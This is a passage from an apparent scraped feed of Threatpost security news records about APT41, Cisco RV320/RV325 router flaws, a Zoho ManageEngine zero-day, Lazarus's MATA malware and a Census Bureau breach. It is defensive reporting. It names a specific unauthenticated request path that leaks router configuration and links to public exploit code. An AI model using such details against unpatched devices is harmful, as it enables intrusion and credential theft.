Researchers aren\u2019t sure what specific exploit was used in this case, but pointed to a Metasploit module combining two CVEs ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/25112442/APT41-timeline.png>)\n\nFinally, on March 8, the threat actor was observed [exploiting a critical vulnerability](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. The flaw ([CVE-2020-10189)](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) was first disclosed on March 5 as a zero-day, and [was later patched](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) on March 7. The attackers exploited the flaw to deploy payloads (install.bat and storesyncsvc.dll) in two ways. First, after exploiting the flaw they directly uploaded a simple Java-based program (\u201clogger.zip\u201d) containing a set of commands, which then used PowerShell to download and execute the payloads. In a second attack, APT41 leveraged a legitimate Microsoft command-line tool, BITSAdmin, to download the payload.\n\nNotably, after exploitation, the attackers have been seen only leveraging publicly available malware, including Cobalt Strike (a [commercially available exploitation framework](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>)) and Meterpreter (a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code). 
Said researchers: \u201cWhile these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance.\u201d\n\n**APT41 Activity **\n\nInterestingly, between waves of exploitation, researchers observed a lull in APT41 activity. The first lull, between Jan. 23 and Feb. 1, was likely related to the Chinese Lunar New Year holidays (which occurred Jan. 24 \u2013 30): \u201cThis has been a common activity pattern by Chinese APT groups in past years as well,\u201d said researchers.\n\nThe second lull, occurring Feb. 2 \u2013 19, may have been related to fallout from the rapid spread of the coronavirus pandemic. Researchers noted that China had initiated [COVID-19 related quarantines](<https://threatpost.com/coronavirus-themed-cyberattacks-persists/153493/>) in cities in the Hubei province Jan. 23 \u2013 24, and rolled out quarantines to additional provinces starting between Feb. 2 and Feb. 10.\n\n\u201cWhile it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry,\u201d said researchers.\n\nThey also said that [APT41 ](<https://threatpost.com/fortnite-ransomware-masquerades-as-an-aimbot-game-hack/147549/>) has [historically](<https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html>) (since 2012) conducted dual Chinese state-sponsored espionage activity and personal, financially motivated activity. 
More recently, in October 2019, the [threat group was discovered](<https://threatpost.com/china-hackers-spy-texts-messagetap-malware/149761/>) using a new malware strain to intercept telecom SMS server traffic and sniff out certain phone numbers and SMS messages \u2013 particularly those with keywords relating to Chinese political dissidents.\n\n\u201cIn 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks,\u201d said researchers on Wednesday. \u201cThis new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage.\u201d\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. 
_**\n", "cvss3": {}, "published": "2020-03-25T15:57:25", "type": "threatpost", "title": "Chinese Hackers Exploit Cisco, Citrix Flaws in Massive Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-19781", "CVE-2020-10189", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-03-25T15:57:25", "id": "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "href": "https://threatpost.com/chinese-hackers-exploit-cisco-citrix-espionage/154133/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-04T12:27:29", "description": "UPDATE\n\nMalicious scanning activity targeting Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN routers is underway, with a swell of opportunistic probes looking for vulnerable devices ramping up since Friday.\n\nAccording to Bad Packets Report\u2019s honeypot data, cyberattackers are targeting a pair of just-patched vulnerabilities that allow remote unauthenticated information disclosure ([CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)) leading to remote code-execution (CVE-2019-1652) on the routers. There are more than 9,000 routers open to the attack, the firm found.\n\nThe first vulnerability exists in the web-based management interface for RV320/RV325; a simple GET request for /cgi-bin/config.exp returns full details of the device\u2019s configuration settings, including administrator credentials (the password is hashed though).\n\n\u201c[This] could allow an unauthenticated, remote attacker to retrieve sensitive configuration information,\u201d explained researcher Troy Mursch, in [an advisory](<https://badpackets.net/over-9000-cisco-rv320-rv325-routers-vulnerable-to-cve-2019-1653/>) published over the weekend. 
\u201cAll configuration details of the RV320/RV325 router are exposed by this vulnerability.\u201d\n\nBad Packets Report\u2019s own scanning efforts [using BinaryEdge](<https://www.binaryedge.io/>), which canvassed 15,309 unique IPv4 hosts, determined that 9,657 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653: Broken down, it works out to 6,247 vulnerable out of 9,852 Cisco RV320 routers scanned; and 3,410 vulnerable out of 5,457 Cisco RV325 routers scanned.\n\nThese are mostly located in the United States, Mursch said, though overall, vulnerable devices were found in 122 countries and on the networks of 1,619 different ISPs \u2013 making for a significant, global attack surface.\n\nOnce a malefactor has gained admin credentials, he or she can further exploit the router after signing in. The CVE-2019-1652 flaw allows an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input.\n\n\u201cAn attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device,\u201d according to Cisco\u2019s [documentation](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1652>). \u201cA successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root.\u201d\n\nA [proof-of-concept](<https://github.com/0x27/CiscoRV320Dump>) for remote code-execution has been detailed by researcher/grey hat David Davidson, but Mursch noted that there are mitigating circumstances.\n\n\u201cIn regards to how the routers are going to be exploited once compromised, it\u2019s not fully known yet,\u201d he told Threatpost. \u201cAt this point, I can only confirm threat actors are only taking inventory of vulnerable devices by scraping the leaked configuration files and credentials. 
The actual damage may be limited due to the capabilities (or lack thereof) noted by David Davidson. Only time will tell.\u201d\n\nDavidson\u2019s tweet explained:\n\n> yeah basically anyone unpatched is probably fucked. except for the fact the 'wget' on these boxes is broken half the time and its probably beyond your average skid to cross compile their mirai bot for the correct mips64rev2 shit (for now)\n> \n> \u2014 some person (@info_dox) [January 26, 2019](<https://twitter.com/info_dox/status/1089002947076333570?ref_src=twsrc%5Etfw>)\n\nOne interesting point to note is that the vulnerability also results in the SSID being leaked.\n\n\u201cThis allows attackers to use services such as WiGLE to determine the physical location of the router,\u201d Mursch told Threatpost.\n\nThis was also the case in the recent [Orange Livebox vulnerability](<https://threatpost.com/19k-orange-livebox-modems-open-to-attack/140376/>), Mursch pointed out. That means that an attacker can mount a variety of on-location proximity hacks, and it also allows easier botnet-building given that many admins use the same credentials for the administrative panel as well as the WiFi network \u2014 opening the door to more devices to enslave.\n\nThe vulnerabilities affect Cisco RV320/RV325 routers running firmware releases 1.4.2.15 and 1.4.2.17. Cisco\u2019s patch should be applied immediately, and administrators should change their devices\u2019 admin and WiFi credentials to thwart any compromise that may have already occurred.\n\n_This post was updated at 6:13 p.m. ET on Jan. 
28, with comments from Mursch._\n", "cvss3": {}, "published": "2019-01-28T16:04:07", "type": "threatpost", "title": "Active Scans Target Vulnerable Cisco Routers for Remote Code-Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-01-28T16:04:07", "id": "THREATPOST:F097BB854B5DC8D38AF4AE693CF4EE96", "href": "https://threatpost.com/scans-cisco-routers-code-execution/141218/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-03-08T12:00:33", "description": "After a botched first attempt at patching two high-severity bugs affecting its RV320 and RV325 routers, Cisco Systems is out with fresh new fixes for both devices. However, Cisco isn\u2019t out of the woods yet. On Thursday, it also reported two new medium-severity router bugs impacting the same router models \u2013 and with no reported fixes or workarounds.\n\nThe good news for Cisco was it said it finally successfully patched its RV320 and RV325 WAN VPN routers after first bungling the fix. Last week, [Cisco notified customers](<https://threatpost.com/cisco-releases-flood-of-patches-for-ios-xe-and-small-business-routers/143228/>) that it had mismanaged a patch originally issued in September 2018 when it attempted to fix two router vulnerabilities ([CVE-2019-1652](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>) and [CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)) \u2013 both rated as being of high importance.\n\n\u201cThe initial fix for this vulnerability was found to be incomplete. The complete fix is now available in Firmware Release 1.4.2.22,\u201d wrote Cisco on Thursday, referring to ([CVE-2019-1652](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>)) a command injection vulnerability. 
According to the bulletin, the flaw allowed an authenticated, remote attacker with administrative privileges to execute arbitrary commands on either the RV320 and RV325 routers.\n\nFor [CVE-2019-1653](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>), Cisco posted the exact [same status update](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>), notifying customers of the same firmware fix. The bug in this case is an information disclosure vulnerability \u201c[that] could allow an unauthenticated, remote attacker to retrieve sensitive information,\u201d Cisco wrote.\n\n**Righting the Routers\u2019 Wrongs **\n\nInitially, the bugs were identified last September by RedTeam Pentesting and patched by Cisco on January 23. Making matters worse, on January 25, security researcher [David Davidson published proof-of-concept](<https://github.com/0x27/CiscoRV320Dump>) hacks for two routers. As customers rushed to apply the patches, hackers reportedly began attacking both routers.\n\nPart of Cisco\u2019s January fix included blacklisting the so-called client for URLs (or cURL) on the modems. CURL is a command line tool for transferring data using various protocols. Presumably, blacklisting the user agent for cURL would keep attackers out. That wasn\u2019t the case, and Cisco critics chimed in, stating that the blacklisting could easily be bypassed.\n\nhttps://twitter.com/hrbrmstr/status/1110995488235503616\n\nLast Wednesday, Cisco admitted as much, relaying a message to customers that both router patches were \u201cincomplete\u201d and that both were still vulnerable to attack. 
It added that in both cases, \u201cfirmware updates that address [these vulnerabilities] are not currently available.\u201d It added there are no workarounds that address either vulnerability.\n\n**New Medium-Severity Headaches for Cisco **\n\nAlso Thursday, Cisco reported two new medium-severity bug also affecting its RV320 and RV325 routers, both with no patches available. One bug ([CVE-2019-1828](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190404-rv-weak-encrypt>)) is tied to weak credential encryption use by both routers. The other is insufficient validation of a user-supplied input bug ([CVE-2019-1827](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190404-rv-xss>)), also affecting both routers.\n\nBoth reports warn, \u201cThere are no workarounds that address this vulnerability.\u201d Cisco does not mention anything about a patch in either advisory.\n\nAs for the weak credential vulnerability, it \u201cexists because affected devices use weak encryption algorithms for user credentials. An attacker could exploit this vulnerability by conducting a man-in-the-middle attack and decrypting intercepted credentials. 
A successful exploit could allow the attacker to gain access to an affected device with administrator privileges,\u201d according to Cisco.\n\nAs for the input bug, Cisco warns, \u201cA vulnerability in the Online Help web service of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the service.\u201d\n\nAs for exploitation of the bugs, Cisco said of the weak credential bug ([CVE-2019-1828](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190404-rv-weak-encrypt>)): \u201cThe Cisco Product Security Incident Response Team (PSIRT) is aware of the public announcement or malicious use of the vulnerability that is described in this advisory.\u201d It thanked GitHub user 0x27 for reporting the vulnerability.\n\nCisco said it was not aware of any public exploits tied to the input validation bug.\n\nCisco did not return a request to comment for this article.\n", "cvss3": {}, "published": "2019-04-05T20:29:09", "type": "threatpost", "title": "Cisco Finally Patches Router Bugs As New Unpatched Flaws Surface", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653", "CVE-2019-1827", "CVE-2019-1828"], "modified": "2019-04-05T20:29:09", "id": "THREATPOST:A584E3ED4239CD6CF484C0B5869C4A4E", "href": "https://threatpost.com/cisco-finally-patches-routers-bugs-as-new-unpatched-flaws-surface/143528/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-03-10T12:44:24", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. 
Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. 
The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. 
Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. 
\u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. 
[Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/?utm_source=rss&utm_medium=rss&utm_campaign=critical-zoho-zero-day-flaw-disclosed", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:22:13", "description": "The North Korea-linked APT known as Lazarus Group has debuted an advanced, multipurpose malware framework, called MATA, to target Windows, Linux and macOS operating systems.\n\nKaspersky researchers uncovered a series of attacks utilizing MATA (so-called because the malware authors themselves call their infrastructure MataNet), involving the infiltration of corporate entities around the world in a quest to steal customer databases and distribute ransomware. The framework consists of several components, such as a loader, an orchestrator (which manages and coordinates the processes once a device is infected) and plugins. And according to artifacts in the code, Lazarus has been using it since spring 2018.\n\n\u201cMalicious toolsets used to target multiple platforms are a rare breed, as they require significant investment from the developer,\u201d explained Kaspersky analysts, in a report issued on Wednesday. \u201cThey are often deployed for long-term use, which results in increased profit for the actor through numerous attacks spread over time. 
In the cases discovered by Kaspersky, the MATA framework was able to target three platforms \u2013 Windows, Linux and macOS \u2013 indicating that the attackers planned to use it for multiple purposes.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs far as victimology, known organizations hit by the MATA framework have been located in Germany, India, Japan, Korea, Turkey and Poland \u2014 indicating that the attacks cast a wide net. Moreover, those victims are in various sectors, and include a software development company, an e-commerce company and an internet service provider.\n\n\u201cFrom one victim, we identified one of their intentions,\u201d according to Kaspersky. \u201cAfter deploying MATA malware and its plugins, the actor attempted to find the victim\u2019s databases and execute several database queries to acquire customer lists. We\u2019re not sure if they completed the exfiltration of the customer database, but it\u2019s certain that customer databases from victims are one of their interests. In addition, MATA was used to distribute VHD ransomware to one victim.\u201d\n\n## **Windows Version**\n\nThe Windows version of MATA consists of several components, according to the firm: Most notably, a loader malware, which is used to load an encrypted next-stage payload; and the payload itself, which is likely the orchestrator malware.\n\n\u201cWe\u2019re not sure that the loaded payload is the orchestrator malware, but almost all victims have the loader and orchestrator on the same machine,\u201d the researchers explained.\n\nThe orchestrator loads encrypted configuration data from a registry key and decrypts it with the AES algorithm. It\u2019s purpose is to load various plugins \u2013 up to 15 of them. 
They perform various functions, including sending the command-and-control (C2) server information about the infected host, such as victim ID, internal version number, Windows version, computer name, user name, IP address and MAC address; creating an HTTP proxy server; executing code; manipulating files; and more.\n\nThe parent process that executes the loader malware is the WMI Provider Host process, which usually means the actor has executed malware from a remote host to move laterally, according to Kaspersky \u2013 meaning that additional hosts in the same network could also be infected.\n\n## **Non-Windows versions of MATA**\n\nA Linux version of the MATA orchestrator was seen in December, [uncovered by Netlab](<https://blog.netlab.360.com/dacls-the-dual-platform-rat-en/>) and dubbed DACLs. It was characterized as a remote access trojan (RAT), bundled together with a set of plugins. Kaspersky has linked DACLs to MATA, with the Linux MATA version including both a Windows and a Linux orchestrator, a Linux tool for listing folders, scripts for exploiting Atlassian Confluence Server ([CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>)) and a legitimate [socat tool](<http://www.dest-unreach.org/socat/>).\n\nNote that the Linux version of MATA has a logsend plugin. This plugin implements an interesting new feature, a \u201cscan\u201d command that tries to establish a TCP connection on ports 8291 (used for administration of MikroTik RouterOS devices) and 8292 (\u201cBloomberg Professional\u201d software) to random IP addresses, excluding addresses belonging to private networks. Any successful connection is logged and sent to the C2. These logs might be used by attackers for target selection.\n\nThe macOS version of the orchestrator meanwhile was found in April, having been ported from the Linux version. 
It [was found hiding](<https://threatpost.com/lazarus-macos-spyware-2fa-application/155532/>) in a trojanized macOS application based on an open-source two-factor authentication application named MinaOTP. Its plugin list is almost identical to the Linux version, except that it also contains a plugin named \u201cplugin_socks,\u201d responsible for configuring proxy servers.\n\n## **Links to Lazarus**\n\nLazarus Group, a.k.a. Hidden Cobra or APT 38, has been around since 2009. The APT has been linked to the highly destructive [WannaCry](<https://threatpost.com/wannacry-shares-code-with-lazarus-apt-samples/125718/>) attack that caused millions of dollars of economic damage in 2017, the [SWIFT banking attacks](<https://threatpost.com/bangladesh-bank-hackers-accessed-swift-system-to-steal-cover-tracks/117637/>), as well as the high-profile attack against [Sony Pictures Entertainment](<https://threatpost.com/f-b-i-mandiant-investigating-sony-pictures-breach/109645/>) in 2014. It even has [spawned a spinoff group](<https://threatpost.com/lazarus-apt-spinoff-linked-to-banking-hacks/124746/>), the entire mission of which is to steal money from banks to fund Lazarus\u2019 cybercriminal operations and the North Korean regime as a whole.\n\nLazarus is also constantly evolving: In December, it was seen hooking up with Trickbot operators, which run [a powerful trojan](<https://threatpost.com/trickbot-malware-now-targets-us-banks/126976/>) that targets U.S. banks and others. 
In May, it was seen [adding macOS spyware](<https://threatpost.com/lazarus-macos-spyware-2fa-application/155532/>) to a two-factor authentication app; and earlier in July, it added [Magecart card-skimming code](<https://threatpost.com/lazarus-group-adds-magecart/157167/>) to its toolbag.\n\nKaspersky has linked the MATA framework to the Lazarus APT group through two unique file names found in the orchestrators: c_2910.cls and k_3872.cls, which have only previously been seen in several variants of the Manuscrypt malware, a known Lazarus tool. Previous research by Netlab also determined the connection between the Linux orchestrator/DACLS RAT and the APT.\n\n\u201cMoreover, MATA uses global configuration data including a randomly generated session ID, date-based version information, a sleep interval and multiple C2s and C2 server addresses,\u201d added the researchers. \u201cWe\u2019ve seen that one of the Manuscrypt variants (ab09f6a249ca88d1a036eee7a02cdd16) shares a similar configuration structure with the MATA framework. This old Manuscrypt variant is an active backdoor that has similar configuration data such as session ID, sleep interval, number of C2 addresses, infected date, and C2 addresses. They are not identical, but they have a similar structure.\u201d\n", "cvss3": {}, "published": "2020-07-22T16:43:44", "type": "threatpost", "title": "Lazarus Group Surfaces with Advanced Malware Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-3396"], "modified": "2020-07-22T16:43:44", "id": "THREATPOST:9CCCABE96BBBCC68E56ED78F253FCA7F", "href": "https://threatpost.com/lazarus-group-advanced-malware-framework/157636/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T14:50:21", "description": "Threat actors exploited an [unpatched Citrix flaw](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) to breach the network of the U.S. 
Census Bureau in January in an attack that was ultimately halted before a backdoor could be installed or sensitive data could be stolen, according [to a report](<https://www.oig.doc.gov/OIGPublications/OIG-21-034-A.pdf>) by a government watchdog organization.\n\nHowever, investigators found that officials were informed of the flaw in the bureau\u2019s servers and had at least two opportunities to fix it before the attack; they did not, mainly due to a lack of coordination between teams responsible for different security tasks, according to the report, published Tuesday by the U.S. Department of Commerce Office of Inspector General. The bureau also lagged in its discovery and reporting of the attack after it happened.\n\nThe report details and reviews the incident that occurred on Jan. 11, 2020, when attackers used the publicly available exploit for a critical flaw to target remote-access servers operated by the bureau.\n\nCitrix released a public notice about the zero-day flaw\u2014tracked as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\u2014in December. In January, a representative from the bureau\u2019s Computer Incident Response Team (CIRT) attended two meetings in which the flaw was discussed, and attendees even received a link to steps for applying fixes that Citrix had already issued.\n\n\u201cDespite the publicly available notices released in December and attending two meetings on the issue in January, the bureau CIRT did not coordinate with the team responsible for implementing these mitigation steps until after the servers had been attacked,\u201d according to the report. 
Doing so could have prevented the attack, investigators noted.\n\n## **\u2018Partially Successful\u2019 Attack**\n\nThe Citrix products affected by the flaw\u2013[discovered](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) by Mikhail Klyuchnikov, a researcher at Positive Technologies\u2014are used for application-aware traffic management and secure remote access, respectively. At least 80,000 organizations in 158 countries\u2014about 38 percent in the U.S.\u2014use these products, formerly called NetScaler ADC and Gateway.\n\nThe initial compromise at the Census Bureau was on servers used to provide the bureau\u2019s enterprise staff with remote-access capabilities to production, development and lab networks. The servers did not provide access to 2020 decennial census networks, officials told investigators.\n\n\u201cThe exploit was partially successful, in that the attacker modified user account data on the systems to prepare for remote code execution,\u201d according to the report. \u201cHowever, the attacker\u2019s attempts to maintain access to the system by creating a backdoor into the affected servers were unsuccessful.\u201d\n\nAttackers were able to make unauthorized changes to the remote-access servers, including the creation of new user accounts, investigators reported. However, the bureau\u2019s firewalls blocked the attacker\u2019s attempts to establish a backdoor to communicate with the attacker\u2019s external command and control infrastructure.\n\n## **Other Mistakes**\n\nAnother security misstep the bureau took that could have mitigated the attack before it even happened was that it was not conducting vulnerability scanning of the remote-access servers as per federal standards and Commerce Department policy, according to the OIG.\n\n\u201cWe found that the bureau vulnerability scanning team maintained a list of devices to be scanned,\u201d investigators wrote. 
\u201cHowever, the remote-access servers were not included on the list, and were therefore not scanned. This occurred because the system and vulnerability scanning teams had not coordinated the transfer of system credentials required for credentialed scanning.\u201d\n\nThe bureau also made mistakes after the attack by neither discovering nor reporting the incident in a timely manner, the OIG found.\n\nIT administrators were not aware that servers were compromised until Jan. 28, more than two weeks after the attack, because the bureau was not using a security information and event management (SIEM) tool to proactively alert incident responders to suspicious network traffic, investigators found.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-19T14:35:49", "type": "threatpost", "title": "Postmortem on U.S. 
